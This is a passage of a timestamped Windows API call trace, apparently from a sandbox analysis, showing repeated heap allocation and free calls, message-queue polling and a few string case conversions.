HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866a20 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38667f8 | out: hHeap=0x2af0000) returned 1 [0212.236] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0212.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0212.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0212.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0212.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0212.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0212.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0212.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0212.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0212.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0212.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0212.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0212.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0212.238] CharLowerBuffW (in: lpsz="byte[7528]", cchLength=0xa | out: lpsz="byte[7528]") returned 0xa [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69850 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0212.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1d68) returned 0x2a8a138 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0212.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a698b0 [0212.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0212.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0212.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69850 | out: hHeap=0x2af0000) returned 1 [0212.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0212.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69850 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0212.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0212.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0212.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1d60) returned 0x2a8bea8 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1d60) returned 0x2a8dc10 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69850 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8bea8 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8dc10 | out: hHeap=0x2af0000) returned 1 [0212.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0212.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0212.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0212.242] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab248 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.242] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0212.242] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.242] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.243] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.243] RtlAllocateHeap 